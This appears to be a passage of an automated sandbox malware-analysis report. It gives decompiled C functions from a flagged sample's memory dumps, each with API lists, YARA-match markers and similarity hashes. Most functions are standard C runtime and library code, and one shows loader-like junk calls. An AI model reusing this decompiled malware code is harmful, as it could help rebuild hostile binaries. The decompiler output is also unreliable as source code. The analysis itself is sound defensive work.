		E00404E60(_t20, _t27);
		return _t20;
	}
	return _t20;
}












APIs
• ___BuildCatchObject.LIBCMT ref: 0040BFD9
  • Part of subcall function 0040BF34: ___BuildCatchObjectHelper.LIBCMT ref: 0040BF6A
• _UnwindNestedFrames.LIBCMT ref: 0040BFF0
• ___FrameUnwindToState.LIBCMT ref: 0040BFFE
Strings
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
• String ID: csm
• API String ID: 2163707966-1018135373
• Opcode ID: 65e56480dffb5ae128494c6c679018921c0179f8a752e43245547446811b7336
• Instruction ID: 143119bd7edf23cd9feb20ca85fc346c0dc8e7272f0b7ac94033c879f7bf42b5
• Opcode Fuzzy Hash: 65e56480dffb5ae128494c6c679018921c0179f8a752e43245547446811b7336
• Instruction Fuzzy Hash: 69014B7100010ABBDF125F52CC41EAB3F6AFF44344F00402ABD18752A1DB3A99B1EBE8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%
E00412FC9() {
	signed long long _v12;
	signed int _v20;
	signed long long _v28;
	signed char _t8;

	_t8 = GetModuleHandleA("KERNEL32");
	if(_t8 == 0) {
		L6:
		_v20 =  *0x4a8d00;
		_v28 =  *0x4a8cf8;
		asm("fsubr qword [ebp-0x18]");
		_v12 = _v28 / _v20 * _v20;
		asm("fld1");
		asm("fcomp qword [ebp-0x8]");
		asm("fnstsw ax");
		if((_t8 & 0x00000005) != 0) {
			return 0;
		} else {
			return 1;
		}
                                                                                      				} else {
                                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                      					if(__eax == 0) {
                                                                                      						goto L6;
                                                                                      					} else {
                                                                                      						_push(0);
                                                                                      						return __eax;
                                                                                      					}
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040A457), ref: 00412FCE
                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00412FDE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                      • API String ID: 1646373207-3105848591
                                                                                      • Opcode ID: 696c5b6b70fecbcbef7714514f9b0ebb35562209ff519f240e0f194f2c56b334
                                                                                      • Instruction ID: ce2a444bca22ddad6f48e3d2ef0d65aa6a2f164b27bdff1f62dbcb6f90fbcb12
                                                                                      • Opcode Fuzzy Hash: 696c5b6b70fecbcbef7714514f9b0ebb35562209ff519f240e0f194f2c56b334
                                                                                      • Instruction Fuzzy Hash: 11F03030A44A0EE2EB001BA5BD0EBAF7E78FB91702F9204A5D592F00C4DF7484B1965A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00403398(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				intOrPtr* _t27;
                                                                                      				void* _t29;
                                                                                      				intOrPtr* _t34;
                                                                                      				void* _t35;
                                                                                      
                                                                                      				_push(0x44);
                                                                                      				E00405255(E004A6D99, __ebx, __edi, __esi);
                                                                                      				E00401CD9(_t35 - 0x28, "invalid string position");
                                                                                      				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                                                                                      				_t27 = _t35 - 0x50;
                                                                                      				E00403311(_t27, _t35 - 0x28);
                                                                                      				E004052D2(_t35 - 0x50, 0x4ab430);
                                                                                      				asm("int3");
                                                                                      				_push(4);
                                                                                      				E00405255(E004A6DBC, __ebx, __edi, __esi);
                                                                                      				_t34 = _t27;
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t34;
                                                                                      				_t31 =  *((intOrPtr*)(_t35 + 8));
                                                                                      				E00403A18(_t27, _t29,  *((intOrPtr*)(_t35 + 8)));
                                                                                      				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                                                                                      				 *_t34 = 0x4a7268;
                                                                                      				E00401CFB(_t34 + 0xc, _t31 + 0xc);
                                                                                      				return E004052BE(_t34);
                                                                                      			}

                                                                                      APIs
                                                                                      • __EH_prolog3.LIBCMT ref: 0040339F
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004033BC
                                                                                        • Part of subcall function 00403311: std::runtime_error::runtime_error.LIBCPMT ref: 0040331C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004033CA
                                                                                        • Part of subcall function 004052D2: RaiseException.KERNEL32(?,?,0040450C,?,?,?,?,?,0040450C,?,004ABC00,004AF820,?,00402B86,00000001,?), ref: 00405314
                                                                                      Strings
                                                                                      • invalid string position, xrefs: 004033A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: invalid string position
                                                                                      • API String ID: 3299838469-1799206989
                                                                                      • Opcode ID: 9c8f2063cb40f5539996fe25a363e48e302d64478ad3885e0f2a29e8491bf070
                                                                                      • Instruction ID: b87caa312b8395cb55a45764c2a9bfb45235ad6508b2e5eef6ae8056ed4a0e91
                                                                                      • Opcode Fuzzy Hash: 9c8f2063cb40f5539996fe25a363e48e302d64478ad3885e0f2a29e8491bf070
                                                                                      • Instruction Fuzzy Hash: C8D01276A5010897CB04EAD1CC46BDD773CAF15318F58046FB201760C2DBBC5A048A28
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FBF1
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC06
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: TeM$TeM
                                                                                      • API String ID: 3728558374-3870166017
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: bc927866261b58b21830ef725e61a80c2a429c546d5406d0ee7701bda1715e25
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 42D06775C0020CBBCF00EFA9D45ACDDBBB8EA14744B00C466A91897646EB74E3498B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 0086197D: __wfsopen.LIBCMT ref: 00861988
                                                                                      • _fgetws.LIBCMT ref: 0084D15C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wfsopen_fgetws
                                                                                      • String ID:
                                                                                      • API String ID: 853134316-0
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: f45374dda3b33e58242347bcb3c9b77f42c3b399eff2f01433551c1c2cd14b12
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 45919E72D0031D9BCF21DFA8C885BAEB7B5FF14304F150529E815E7241E776AA08CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1783060780-0
                                                                                      • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction ID: f6e02dda12e279041ae9174eab9231aba2f575b0c442e802805b5e3fd86ee2e5
                                                                                      • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction Fuzzy Hash: 5CA160B1C0024CEBEF11EBD8D84ABDEBB75FF15304F140028E505BA292D7765A48CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00414327(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                      				char _v8;
                                                                                      				signed int _v12;
                                                                                      				char _v20;
                                                                                      				char _t43;
                                                                                      				char _t46;
                                                                                      				signed int _t53;
                                                                                      				signed int _t54;
                                                                                      				intOrPtr _t56;
                                                                                      				intOrPtr _t57;
                                                                                      				int _t58;
                                                                                      				signed short* _t59;
                                                                                      				short* _t60;
                                                                                      				int _t65;
                                                                                      				char* _t73;
                                                                                      
                                                                                      				_t73 = _a8;
                                                                                      				if(_t73 == 0 || _a12 == 0) {
                                                                                      					L5:
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					if( *_t73 != 0) {
                                                                                      						E004042F7( &_v20, __edi, _a16);
                                                                                      						_t43 = _v20;
                                                                                      						__eflags =  *(_t43 + 0x14);
                                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                                      							_t46 = E0041243A( *_t73 & 0x000000ff,  &_v20);
                                                                                      							__eflags = _t46;
                                                                                      							if(_t46 == 0) {
                                                                                      								__eflags = _a4;
                                                                                      								_t40 = _v20 + 4; // 0x840ffff8
                                                                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                      								if(__eflags != 0) {
                                                                                      									L10:
                                                                                      									__eflags = _v8;
                                                                                      									if(_v8 != 0) {
                                                                                      										_t53 = _v12;
                                                                                      										_t11 = _t53 + 0x70;
                                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                      										__eflags =  *_t11;
                                                                                      									}
                                                                                      									return 1;
                                                                                      								}
                                                                                      								L21:
                                                                                      								_t54 = E004046FF(__eflags);
                                                                                      								 *_t54 = 0x2a;
                                                                                      								__eflags = _v8;
                                                                                      								if(_v8 != 0) {
                                                                                      									_t54 = _v12;
                                                                                      									_t33 = _t54 + 0x70;
                                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                      									__eflags =  *_t33;
                                                                                      								}
                                                                                      								return _t54 | 0xffffffff;
                                                                                      							}
                                                                                      							_t56 = _v20;
                                                                                      							_t15 = _t56 + 0xac; // 0x75ff5003
                                                                                      							_t65 =  *_t15;
                                                                                      							__eflags = _t65 - 1;
                                                                                      							if(_t65 <= 1) {
                                                                                      								L17:
                                                                                      								_t24 = _t56 + 0xac; // 0x75ff5003
                                                                                      								__eflags = _a12 -  *_t24;
                                                                                      								if(__eflags < 0) {
                                                                                      									goto L21;
                                                                                      								}
                                                                                      								__eflags = _t73[1];
                                                                                      								if(__eflags == 0) {
                                                                                      									goto L21;
                                                                                      								}
                                                                                      								L19:
                                                                                      								_t26 = _t56 + 0xac; // 0x75ff5003
                                                                                      								_t57 =  *_t26;
                                                                                      								__eflags = _v8;
                                                                                      								if(_v8 == 0) {
                                                                                      									return _t57;
                                                                                      								}
                                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                      								return _t57;
                                                                                      							}
                                                                                      							__eflags = _a12 - _t65;
                                                                                      							if(_a12 < _t65) {
                                                                                      								goto L17;
                                                                                      							}
                                                                                      							__eflags = _a4;
                                                                                      							_t21 = _t56 + 4; // 0x840ffff8
                                                                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                      							__eflags = _t58;
                                                                                      							_t56 = _v20;
                                                                                      							if(_t58 != 0) {
                                                                                      								goto L19;
                                                                                      							}
                                                                                      							goto L17;
                                                                                      						}
                                                                                      						_t59 = _a4;
                                                                                      						__eflags = _t59;
                                                                                      						if(_t59 != 0) {
                                                                                      							 *_t59 =  *_t73 & 0x000000ff;
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					} else {
                                                                                      						_t60 = _a4;
                                                                                      						if(_t60 != 0) {
                                                                                      							 *_t60 = 0;
                                                                                      						}
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041435B
                                                                                      • __isleadbyte_l.LIBCMT ref: 0041438F
                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,004105DD,00000109,00BFBBEF,00000003), ref: 004143C0
                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,004105DD,00000109,00BFBBEF,00000003), ref: 0041442E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: d9032bf244deee50afee4c11327133573360b0989e8050411d1d4d1ece1c927a
                                                                                      • Instruction ID: a4e4f2a512e3bba8090ed344a9828e621a322db48d8ff2693eb3dc40bc716d53
                                                                                      • Opcode Fuzzy Hash: d9032bf244deee50afee4c11327133573360b0989e8050411d1d4d1ece1c927a
                                                                                      • Instruction Fuzzy Hash: 2231E430B00259EFCB20DF64C8449EE3BA5EF81310B19856AE8748B291D334DD90DB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E004028DA(void* __eflags) {
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t27;
                                                                                      				intOrPtr* _t29;
                                                                                      				void* _t39;
                                                                                      				intOrPtr* _t40;
                                                                                      				void* _t50;
                                                                                      				void* _t51;
                                                                                      				intOrPtr* _t55;
                                                                                      				void* _t57;
                                                                                      
                                                                                      				E004A6CC8(E004A6E45, _t57);
                                                                                      				_push(_t39);
                                                                                      				_t55 =  *((intOrPtr*)(_t57 + 8));
                                                                                      				_push(_t51);
                                                                                      				_t2 = _t55 + 4; // 0x4a99a8
                                                                                      				 *_t55 = 0x4a9960;
                                                                                      				E00403444(_t39, _t2, _t51, __eflags);
                                                                                      				_push(4);
                                                                                      				 *((intOrPtr*)(_t57 - 4)) = 0;
                                                                                      				_t40 = E004044A8(_t39, _t50, 0, __eflags);
                                                                                      				_t61 = _t40;
                                                                                      				if(_t40 == 0) {
                                                                                      					_t27 = 0;
                                                                                      					__eflags = 0;
                                                                                      				} else {
                                                                                      					 *_t40 = E004030B0(_t40, 0, _t55, _t61);
                                                                                      					E004011D6(E00402EDE());
                                                                                      					_t27 = _t40;
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t55 + 0x38)) = _t27;
                                                                                      				_t5 = _t55 + 0x18; // 0x4a99bc
                                                                                      				 *((intOrPtr*)(_t55 + 0x20)) = _t5;
                                                                                      				_t7 = _t55 + 0x1c; // 0x4a99c0
                                                                                      				 *((intOrPtr*)(_t55 + 0x24)) = _t7;
                                                                                      				_t9 = _t55 + 8; // 0x4a99ac
                                                                                      				 *((intOrPtr*)(_t55 + 0x10)) = _t9;
                                                                                      				_t11 = _t55 + 0x28; // 0x4a99cc
                                                                                      				 *((intOrPtr*)(_t55 + 0x30)) = _t11;
                                                                                      				_t13 = _t55 + 0xc; // 0x4a99b0
                                                                                      				_t29 = _t13;
                                                                                      				 *((intOrPtr*)(_t55 + 0x14)) = _t29;
                                                                                      				_t15 = _t55 + 0x2c; // 0x4a99d0
                                                                                      				 *((intOrPtr*)(_t55 + 0x34)) = _t15;
                                                                                      				 *_t29 = 0;
                                                                                      				_t18 = _t55 + 0x24; // 0x401d7f
                                                                                      				 *((intOrPtr*)( *_t18)) = 0;
                                                                                      				_t19 = _t55 + 0x34; // 0x4022f0
                                                                                      				 *((intOrPtr*)( *_t19)) = 0;
                                                                                      				_t20 = _t55 + 0x10; // 0x402619
                                                                                      				 *((intOrPtr*)( *_t20)) = 0;
                                                                                      				_t21 = _t55 + 0x20; // 0x40228c
                                                                                      				 *((intOrPtr*)( *_t21)) = 0;
                                                                                      				_t22 = _t55 + 0x30; // 0x401e43
                                                                                      				 *((intOrPtr*)( *_t22)) = 0;
                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
                                                                                      				return _t55;
                                                                                      			}

                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 004028DF
                                                                                      • std::_Mutex::_Mutex.LIBCPMT ref: 004028F3
                                                                                        • Part of subcall function 004044A8: _malloc.LIBCMT ref: 004044C2
                                                                                      • std::locale::_Init.LIBCPMT ref: 0040290B
                                                                                        • Part of subcall function 004030B0: __EH_prolog3.LIBCMT ref: 004030B7
                                                                                        • Part of subcall function 004030B0: std::_Lockit::_Lockit.LIBCPMT ref: 004030CB
                                                                                        • Part of subcall function 004030B0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004030F4
                                                                                        • Part of subcall function 004030B0: std::locale::_Setgloballocale.LIBCPMT ref: 00403104
                                                                                        • Part of subcall function 004030B0: std::locale::facet::_Incref.LIBCPMT ref: 00403127
                                                                                      • std::locale::facet::_Incref.LIBCPMT ref: 00402919
                                                                                        • Part of subcall function 004011D6: std::_Lockit::_Lockit.LIBCPMT ref: 004011E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: std::_std::locale::_$IncrefLockitLockit::_std::locale::facet::_$H_prologH_prolog3InitLocimpLocimp::_MutexMutex::_Setgloballocale_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 2350284691-0
                                                                                      • Opcode ID: d973227bcccd0faa3c29e70a0a63d830a0d9d71b8b478eb4f9a75d3ce48151f8
                                                                                      • Instruction ID: ec8f6c415541bc0e296b0a456e6f2814170bb18dfd991079c9efbb856b131679
                                                                                      • Opcode Fuzzy Hash: d973227bcccd0faa3c29e70a0a63d830a0d9d71b8b478eb4f9a75d3ce48151f8
                                                                                      • Instruction Fuzzy Hash: B221C2B5600B008FC326DF6AC180996FBF8FF697107004A2FE99697B90E774B908CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00412EB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                      				intOrPtr _t25;
                                                                                      				void* _t26;
                                                                                      				void* _t28;
                                                                                      
                                                                                      				_t25 = _a16;
                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                      					_t26 = E004127A6(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                      					goto L9;
                                                                                      				} else {
                                                                                      					_t34 = _t25 - 0x66;
                                                                                      					if(_t25 != 0x66) {
                                                                                      						__eflags = _t25 - 0x61;
                                                                                      						if(_t25 == 0x61) {
                                                                                      							L7:
                                                                                      							_t26 = E00412896(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                      						} else {
                                                                                      							__eflags = _t25 - 0x41;
                                                                                      							if(__eflags == 0) {
                                                                                      								goto L7;
                                                                                      							} else {
                                                                                      								_t26 = E00412DBB(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                      							}
                                                                                      						}
                                                                                      						L9:
                                                                                      						return _t26;
                                                                                      					} else {
                                                                                      						return E00412D00(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                      					}
                                                                                      				}
                                                                                      			}
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                      • String ID:
                                                                                      • API String ID: 3016257755-0
                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                      • Instruction ID: a2730941904a6584cf00af9cbe43493491fc7167fb6b6f2d9ebcb61f9e4e88fc
                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                      • Instruction Fuzzy Hash: B9118C3604014ABBCF125E84DE01CEE3F72BB19354F198416FE1898131D27AC9B2FB89
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E00401C55(void* __ebx, void* __edx, void* __edi, void* __fp0) {
                                                                                      				char _v60;
                                                                                      				char _v140;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr _t5;
                                                                                      				void* _t21;
                                                                                      				void* _t26;
                                                                                      
                                                                                      				_t22 = __edi;
                                                                                      				_t21 = __edx;
                                                                                      				_t17 = __ebx;
                                                                                      				_t5 =  *0x4af38c; // 0xfffde25d
                                                                                      				 *0x4b8384 = _t5;
                                                                                      				if(_t5 == 0xc) {
                                                                                      					GetQueuedCompletionStatus(0, 0, 0, 0, 0);
                                                                                      					_push(0);
                                                                                      					E0040417A(__ebx, _t21, __edi, 0, 0);
                                                                                      					_push(0);
                                                                                      					_push(0);
                                                                                      					_push(0);
                                                                                      					E00404272(__ebx, _t21, __edi, 0, 0);
                                                                                      					E00404429(0);
                                                                                      					st0 = __fp0;
                                                                                      					_push( &_v140);
                                                                                      					E00401F06();
                                                                                      					E00401FAF( &_v60, __edi);
                                                                                      					_v60 = 0x4a9950;
                                                                                      					E00402E05(_t22,  &_v60);
                                                                                      				}
                                                                                      				 *0x4b8384 =  *0x4b8384 + 0xb2d3b;
                                                                                      				E00401AD1(_t17, _t21, _t26);
                                                                                      				return 0;
                                                                                      			}
                                                                                      APIs
                                                                                      • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00401C78
                                                                                      • _ftell.LIBCMT ref: 00401C7F
                                                                                      • _fseek.LIBCMT ref: 00401C88
                                                                                        • Part of subcall function 00404429: __atof_l.LIBCMT ref: 00404433
                                                                                        • Part of subcall function 00401F06: __EH_prolog.LIBCMT ref: 00401F0B
                                                                                        • Part of subcall function 00401FAF: __EH_prolog.LIBCMT ref: 00401FB4
                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00401CBB
                                                                                        • Part of subcall function 00402E05: std::ios_base::_Tidy.LIBCPMT ref: 00402E2A
                                                                                        • Part of subcall function 00402E05: ctype.LIBCPMT ref: 00402E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: H_prologstd::ios_base::_$CompletionIos_base_dtorQueuedStatusTidy__atof_l_fseek_ftellctype
                                                                                      • String ID:
                                                                                      • API String ID: 2470585456-0
                                                                                      • Opcode ID: c404d38d466b7c60573621991a887d9f5085339926a64ff574b134dcc87602cf
                                                                                      • Instruction ID: 883ced5b71cb0e625afc84b017ce21bc067161038f3f488878c8512fd02bb827
                                                                                      • Opcode Fuzzy Hash: c404d38d466b7c60573621991a887d9f5085339926a64ff574b134dcc87602cf
                                                                                      • Instruction Fuzzy Hash: 20F081B14051145BC360FBA6AC4AC8F7BDC9E46364F40063FF55492191EB7C9514D7EE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E004055F3(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                      				signed int _t13;
                                                                                      				intOrPtr _t28;
                                                                                      				void* _t29;
                                                                                      				void* _t30;
                                                                                      
                                                                                      				_t30 = __eflags;
                                                                                      				_t26 = __edi;
                                                                                      				_t25 = __edx;
                                                                                      				_t22 = __ebx;
                                                                                      				_push(0xc);
                                                                                      				_push(0x4ab5b0);
                                                                                      				E004080B0(__ebx, __edi, __esi);
                                                                                      				_t28 = E00408C61(__ebx, __edx, __edi, _t30);
                                                                                      				_t13 =  *0x4adc98; // 0xfffffffe
                                                                                      				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                      					L6:
                                                                                      					E004075B9(_t22, 0xc);
                                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                                      					_t26 =  *0x4add80; // 0x4adca8
                                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E004055B5(_t8, _t26);
                                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                                      					E0040565D();
                                                                                      				} else {
                                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                      						goto L6;
                                                                                      					} else {
                                                                                      						_t28 =  *((intOrPtr*)(E00408C61(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                      					}
                                                                                      				}
                                                                                      				if(_t28 == 0) {
                                                                                      					E004083EA(_t25, _t26, 0x20);
                                                                                      				}
                                                                                      				return E004080F5(_t28);
                                                                                      			}
                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 004055FF
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
